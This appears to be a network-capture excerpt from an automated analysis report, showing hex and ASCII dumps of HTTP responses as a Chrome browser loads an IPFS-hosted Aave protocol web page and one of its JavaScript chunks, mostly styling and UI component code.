                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeifflinwfvekqcgxhifd3j7pbgjbn52ece2chmlpkbmaajscns4nwm
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-09
                                                                                                                                                                                                                                                  CF-Cache-Status: MISS
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e4562a178cb9-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:53 UTC268INData Raw: 37 62 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 2f 3e 3c 74 69 74 6c 65 3e 41 61 76 65 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 4c 69 71 75 69 64 69 74 79 20 50 72 6f 74 6f 63 6f 6c 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 61 76 65 20 69 73 20 61 6e 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 50 72 6f 74 6f 63 6f 6c 20 74 6f
                                                                                                                                                                                                                                                  Data Ascii: 7b51<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="initial-scale=1, width=device-width"/><title>Aave - Open Source Liquidity Protocol</title><meta name="description" content="Aave is an Open Source Protocol to
                                                                                                                                                                                                                                                  2024-09-28 04:11:53 UTC1369INData Raw: 75 73 74 6f 64 69 61 6c 20 4c 69 71 75 69 64 69 74 79 20 4d 61 72 6b 65 74 73 20 74 6f 20 65 61 72 6e 20 69 6e 74 65 72 65 73 74 20 6f 6e 20 73 75 70 70 6c 79 69 6e 67 20 61 6e 64 20 62 6f 72 72 6f 77 69 6e 67 20 61 73 73 65 74 73 20 77 69 74 68 20 61 20 76 61 72 69 61 62 6c 65 20 6f 72 20 73 74 61 62 6c 65 20 69 6e 74 65 72 65 73 74 20 72 61 74 65 2e 20 54 68 65 20 70 72 6f 74 6f 63 6f 6c 20 69 73 20 64 65 73 69 67 6e 65 64 20 66 6f 72 20 65 61 73 79 20 69 6e 74 65 67 72 61 74 69 6f 6e 20 69 6e 74 6f 20 79 6f 75 72 20 70 72 6f 64 75 63 74 73 20 61 6e 64 20 73 65 72 76 69 63 65 73 2e 22 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 61 76 65 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 4c
                                                                                                                                                                                                                                                  Data Ascii: ustodial Liquidity Markets to earn interest on supplying and borrowing assets with a variable or stable interest rate. The protocol is designed for easy integration into your products and services."/><meta property="og:title" content="Aave - Open Source L
                                                                                                                                                                                                                                                  2024-09-28 04:11:53 UTC1369INData Raw: 2c 20 73 6d 61 72 74 20 63 6f 6e 74 72 61 63 74 73 2c 20 6f 70 65 6e 20 66 69 6e 61 6e 63 65 2c 20 74 72 75 73 74 6c 65 73 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 61 76 65 5f 69 63 6f 6e 31 38 30 2e 70 6e 67 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 61 76 65 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61
                                                                                                                                                                                                                                                  Data Ascii: , smart contracts, open finance, trustless"/><link rel="apple-touch-icon" href="/aave_icon180.png"/><meta name="apple-mobile-web-app-title" content="Aave"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-status-ba
                                                                                                                                                                                                                                                  2024-09-28 04:11:53 UTC1369INData Raw: 31 30 30 76 68 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 64 61 74 61 2d 65 6d 6f 74 69 6f 6e 3d 22 63 73 73 2d 67 6c 6f 62 61 6c 20 31 70 72 66 61 78 6e 22 3e 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 6d 75 69 2d 61 75 74 6f 2d 66 69 6c 6c 7b 66 72 6f 6d 7b 64 69 73 70 6c 61 79 3a 62
                                                                                                                                                                                                                                                  Data Ascii: 100vh;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;}</style><style data-emotion="css-global 1prfaxn">@-webkit-keyframes mui-auto-fill{from{display:b
                                                                                                                                                                                                                                                  2024-09-28 04:11:53 UTC1369INData Raw: 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 78 2d 73 68 61 64 6f 77 20 33 30 30 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 20 30 2c 20 30 2e 32 2c 20 31 29 20 30 6d 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 78 2d 73 68 61 64 6f 77 20 33 30 30 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 20 30 2c 20 30 2e 32 2c 20 31 29 20 30 6d 73 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 32 70 78 20 34 70 78 20 2d 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 2c 30 70 78 20 34 70 78 20 35 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 34 29 2c 30 70 78 20 31 70 78 20 31 30 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 32 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78
                                                                                                                                                                                                                                                  Data Ascii: bkit-transition:box-shadow 300ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;transition:box-shadow 300ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;box-shadow:0px 2px 4px -1px rgba(0,0,0,0.2),0px 4px 5px 0px rgba(0,0,0,0.14),0px 1px 10px 0px rgba(0,0,0,0.12);border-radius:4px
                                                                                                                                                                                                                                                  2024-09-28 04:11:53 UTC1369INData Raw: 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 31 30 30 25 3b 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 30 70 78 29 7b 2e 63 73 73 2d 67 7a 75 34 7a 77 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 32 70 78 3b 7d 7d 2e 63 73 73 2d 31 74 70 36 71 33 69 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 70 78
                                                                                                                                                                                                                                                  Data Ascii: stify-content:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;width:100%;}@media (min-width:760px){.css-gzu4zw{padding-left:12px;padding-right:12px;}}.css-1tp6q3i{padding-right:0px
                                                                                                                                                                                                                                                  2024-09-28 04:11:53 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 32 35 30 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 20 30 2c 20 30 2e 32 2c 20 31 29 20 30 6d 73 2c 62 6f 78 2d 73 68 61 64 6f 77 20 32 35 30 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 20 30 2c 20 30 2e 32 2c 20 31 29 20 30 6d 73 2c 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 32 35 30 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 20 30 2c 20 30 2e 32 2c 20 31 29 20 30 6d 73 2c 63 6f 6c 6f 72 20 32 35 30 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 20 30 2c 20 30 2e 32 2c 20 31 29 20 30 6d 73 3b 63 6f 6c 6f 72 3a 23 33 38 33 44 35 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 31 32 35 72 65 6d 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 62 6f 72 64 65
                                                                                                                                                                                                                                                  Data Ascii: kground-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;color:#383D51;font-size:0.8125rem;box-shadow:none;borde
                                                                                                                                                                                                                                                  2024-09-28 04:11:53 UTC1369INData Raw: 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 75 73 65 72 2d
                                                                                                                                                                                                                                                  Data Ascii: ter;position:relative;box-sizing:border-box;-webkit-tap-highlight-color:transparent;background-color:transparent;outline:0;border:0;margin:0;border-radius:0;padding:0;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-
                                                                                                                                                                                                                                                  2024-09-28 04:11:53 UTC1369INData Raw: 20 6e 6f 6e 65 29 7b 2e 63 73 73 2d 32 6d 78 37 6f 6c 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 7d 2e 63 73 73 2d 32 6d 78 37 6f 6c 2e 4d 75 69 2d 64 69 73 61 62 6c 65 64 7b 63 6f 6c 6f 72 3a 23 42 42 42 45 43 41 3b 7d 2e 63 73 73 2d 32 6d 78 37 6f 6c 3a 68 6f 76 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 63 73 73 2d 32 6d 78 37 6f 6c 2e 4d 75 69 2d 66 6f 63 75 73 56 69 73 69 62 6c 65 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 63 73 73 2d 32 6d 78 37 6f 6c 3a 61 63 74 69 76 65 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 63 73 73 2d 32 6d 78 37 6f 6c 2e 4d 75 69 2d 64 69 73 61 62 6c 65 64 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d
                                                                                                                                                                                                                                                  Data Ascii: none){.css-2mx7ol:hover{background-color:transparent;}}.css-2mx7ol.Mui-disabled{color:#BBBECA;}.css-2mx7ol:hover{box-shadow:none;}.css-2mx7ol.Mui-focusVisible{box-shadow:none;}.css-2mx7ol:active{box-shadow:none;}.css-2mx7ol.Mui-disabled{box-shadow:none;}
                                                                                                                                                                                                                                                  2024-09-28 04:11:53 UTC1369INData Raw: 38 70 78 20 32 30 70 78 3b 7d 7d 2e 63 73 73 2d 31 61 62 65 67 38 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 49 6e 74 65 72 2c 41 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 2e 30 30 39 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 33 25 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 37 35 72 65 6d 3b 63 6f 6c 6f 72 3a 23 33 38 33 44 35 31 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 32 70 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 30 2e 33 73
                                                                                                                                                                                                                                                  Data Ascii: 8px 20px;}}.css-1abeg8a{margin:0;font-family:Inter,Arial;font-weight:400;letter-spacing:0.009375rem;line-height:143%;font-size:0.875rem;color:#383D51;-webkit-text-decoration:none;text-decoration:none;line-height:0;margin-right:12px;-webkit-transition:0.3s


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  107192.168.2.549831209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:53 UTC750OUTGET /_next/static/chunks/9421.b5ce6bd95a5baa0f.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:54 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 35657
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihyjaykclbgp7t6ogtsyc53a2rini65llbzecqqqunoj3ozok7o3i"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9421.b5ce6bd95a5baa0f.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreihyjaykclbgp7t6ogtsyc53a2rini65llbzecqqqunoj3ozok7o3i
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-09
                                                                                                                                                                                                                                                  CF-Cache-Status: MISS
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 35 63 31 66 33 36 37 32 39 65 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8ca0e45c1f36729e-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 34 32 31 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 61 3d 72 28 6e 28 36 34 39 33 38 29 29 2c 6f 3d 6e 28 38 35 38 39 33 29 2c 73 3d 28 30 2c 61 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 6f 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9421],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var a=r(n(64938)),o=n(85893),s=(0,a.default)((0,o.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 38 42 36 22 7d 2c 74 29 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 31 20 31 39 22 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 57 61 6c 6c 65 74 22 7d 2c 6e 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 73 2e 6a 73 78 73 29 28 22 67 22 2c 7b 63 6c 69 70 50 61 74 68 3a 22 75 72 6c 28 23 63 6c 69 70 30 5f 33 37 31 39 5f 33 33 32 33 29 22 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 22 32 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 73 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 37 2e 33 32 30 33 20 31 37 2e 33 39 38 48 33 2e 33 32 30 33 31 43 32 2e 37 38 39 38 38 20 31 37 2e 33 39 38 20 32 2e 32 38 31 31 37 20 31 37 2e 31 38 37 32 20
                                                                                                                                                                                                                                                  Data Ascii: 8B6"},t),viewBox:"0 0 21 19",xmlns:"http://www.w3.org/2000/svg","aria-label":"Wallet"},n),{},{children:[(0,s.jsxs)("g",{clipPath:"url(#clip0_3719_3323)",strokeWidth:"2",children:[(0,s.jsx)("path",{d:"M17.3203 17.398H3.32031C2.78988 17.398 2.28117 17.1872
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 34 34 20 32 2e 30 30 32 38 35 20 34 2e 33 36 35 34 39 20 31 2e 37 33 34 33 20 34 2e 37 31 35 30 36 43 31 2e 34 36 35 37 35 20 35 2e 30 36 34 36 32 20 31 2e 33 32 30 32 31 20 35 2e 34 39 33 31 32 20 31 2e 33 32 30 33 31 20 35 2e 39 33 33 39 33 56 36 2e 33 39 37 39 33 22 7d 29 5d 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 22 64 65 66 73 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 29 28 22 63 6c 69 70 50 61 74 68 22 2c 7b 69 64 3a 22 63 6c 69 70 30 5f 33 37 31 39 5f 33 33 32 33 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 29 28 22 72 65 63 74 22 2c 7b 77 69 64 74 68 3a 22 32 30 22 2c 68 65 69 67 68 74 3a 22 31 39 22 2c 66 69 6c 6c 3a 22 77 68 69 74 65 22 2c 74 72 61 6e 73 66 6f 72 6d 3a 22 74 72 61 6e 73 6c 61 74 65 28 30 2e 33 32 30
                                                                                                                                                                                                                                                  Data Ascii: 44 2.00285 4.36549 1.7343 4.71506C1.46575 5.06462 1.32021 5.49312 1.32031 5.93393V6.39793"})]}),(0,s.jsx)("defs",{children:(0,s.jsx)("clipPath",{id:"clip0_3719_3323",children:(0,s.jsx)("rect",{width:"20",height:"19",fill:"white",transform:"translate(0.320
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 61 6c 6c 22 2c 73 78 3a 7b 6d 74 3a 36 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 76 2e 6a 73 78 29 28 72 2e 63 43 2c 7b 69 64 3a 22 43 6f 70 79 20 65 72 72 6f 72 20 74 65 78 74 22 7d 29 2c 28 30 2c 76 2e 6a 73 78 29 28 69 2e 5a 2c 7b 73 78 3a 7b 6d 6c 3a 2e 35 2c 66 6f 6e 74 53 69 7a 65 3a 22 31 32 70 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 7d 29 7d 29 5d 7d 29 5d 7d 29 2c 28 30 2c 76 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 6d 74 3a 31 32 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 64 2e 5a 2c 7b 6f 6e 43 6c 69 63 6b 3a 6e 2c 76 61 72 69 61 6e 74 3a 22 63 6f 6e 74 61 69 6e
                                                                                                                                                                                                                                                  Data Ascii: all",sx:{mt:6},children:[(0,v.jsx)(r.cC,{id:"Copy error text"}),(0,v.jsx)(i.Z,{sx:{ml:.5,fontSize:"12px"},children:(0,v.jsx)(o.Z,{})})]})]}),(0,v.jsx)(s.Z,{sx:{display:"flex",flexDirection:"column",mt:12},children:(0,v.jsx)(d.Z,{onClick:n,variant:"contain
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 29 2c 67 3d 6e 28 35 35 32 30 30 29 2c 78 3d 6e 28 38 35 38 39 33 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 74 78 48 61 73 68 2c 6e 3d 65 2e 61 63 74 69 6f 6e 2c 66 3d 65 2e 61 6d 6f 75 6e 74 2c 68 3d 65 2e 73 79 6d 62 6f 6c 2c 6d 3d 65 2e 63 6f 6c 6c 61 74 65 72 61 6c 2c 79 3d 65 2e 72 61 74 65 2c 62 3d 65 2e 61 64 64 54 6f 6b 65 6e 2c 41 3d 65 2e 63 75 73 74 6f 6d 41 63 74 69 6f 6e 2c 6a 3d 65 2e 63 75 73 74 6f 6d 54 65 78 74 2c 6b 3d 28 30 2c 70 2e 5a 29 28 29 2e 61 64 64 45 52 43 32 30 54 6f 6b 65 6e 2c 77 3d 28 30 2c 6c 2e 75 73 65 53 74 61 74 65 29 28 22 22 29 2c 54 3d 77 5b 30 5d 2c 43 3d 77 5b 31 5d 2c 4f 3d 28 30 2c 6f 2e 5a 29 28 29 3b 72 65 74 75 72 6e 28 30 2c 78 2e 6a 73 78 29 28 67 2e 52 2c 7b 74 78 48 61 73 68
                                                                                                                                                                                                                                                  Data Ascii: ),g=n(55200),x=n(85893),f=function(e){var t=e.txHash,n=e.action,f=e.amount,h=e.symbol,m=e.collateral,y=e.rate,b=e.addToken,A=e.customAction,j=e.customText,k=(0,p.Z)().addERC20Token,w=(0,l.useState)(""),T=w[0],C=w[1],O=(0,o.Z)();return(0,x.jsx)(g.R,{txHash
